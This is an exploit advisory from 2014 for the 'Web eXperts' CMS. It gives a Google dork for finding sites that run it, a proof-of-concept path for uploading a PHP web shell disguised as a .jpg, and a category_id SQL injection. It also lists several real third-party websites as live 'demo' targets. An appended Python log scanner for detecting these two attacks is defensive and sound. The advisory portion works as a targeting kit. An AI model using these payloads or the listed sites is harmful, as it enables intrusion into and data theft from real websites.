
Web eXperts FileUpload/SQLi vulnerabilities

Author: TUNISIAN CYBER, Published: 21-01-2014
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Web eXperts FileUpload/SQLi vulnerabilities
[+] Date: 14-01-2014
[+] Category: WebApp
[+] Google Dork: :intext:"Website Design & Developed By Web eXperts"
[+] Tested on: KaliLinux
[+] Friend's blog: www.na3il.com

########################################################################################
+Exploit:
Web eXperts suffers from File Upload and SQLi vulnerabilities.

1/File Upload:
+P.O.C:
127.0.0.1/[PATH]/addons/imagelibrary/insert_image.php?wysiwyg=

Shell path:
site.ltd/uploads/h4x3d.php.jpg

2/SQLi:
127.0.0.1/products.php?category_id=sql

Demo:
http://www.strivesports.com//products.php?category_id=1'
http://www.hangal.com.pk/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.strivesports.com/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.sarsonss.com/products.php?category_id=1'
http://www.sirgeeintl.com/products.php?category_id=1'

./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################
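
A defender-side check for the two issues listed above, as an added example that is not part of the original advisory: it scans web-server access logs for non-numeric category_id values on products.php, POSTs to insert_image.php, and files under /uploads/ whose name carries a PHP extension. The log lines, the combined log format and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jan/2014:10:00:01 +0000] "GET /products.php?category_id=3 HTTP/1.1" 200 5120
203.0.113.9 - - [14/Jan/2014:10:02:11 +0000] "GET /products.php?category_id=1%27 HTTP/1.1" 500 312
203.0.113.9 - - [14/Jan/2014:10:03:40 +0000] "POST /addons/imagelibrary/insert_image.php?wysiwyg= HTTP/1.1" 200 901
203.0.113.9 - - [14/Jan/2014:10:03:52 +0000] "GET /uploads/h4x3d.php.jpg HTTP/1.1" 200 17
198.51.100.7 - - [14/Jan/2014:10:05:00 +0000] "GET /uploads/banner.jpg HTTP/1.1" 200 20480
"""

REQUEST = re.compile(r'^(\S+) .*?"(GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.IGNORECASE)

def classify(method, target):
    """Return a list of finding labels for one request (empty if nothing stands out)."""
    url = urlsplit(target)
    path = url.path.lower()
    findings = []
    if path.endswith("/products.php"):
        # parse_qs URL-decodes values, so %27 is compared as a literal quote.
        for value in parse_qs(url.query, keep_blank_values=True).get("category_id", []):
            if not re.fullmatch(r"[0-9]+", value):
                findings.append("non-numeric category_id")
    if path.endswith("/addons/imagelibrary/insert_image.php") and method == "POST":
        findings.append("upload request to insert_image.php")
    if "/uploads/" in path and SCRIPT_EXT.search(path.rsplit("/", 1)[-1]):
        findings.append("script extension in uploaded file name")
    return findings

def scan(log_text):
    """Return (client_ip, request_target, findings) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, method, target, _status = m.groups()
        findings = classify(method, target)
        if findings:
            hits.append((ip, target, findings))
    return hits

if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, "; ".join(findings))
```

Hits on the upload rule are worth correlating with the files actually present in the uploads directory, since a name such as `*.php.jpg` can be executed when the server maps handlers by any extension in the name.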
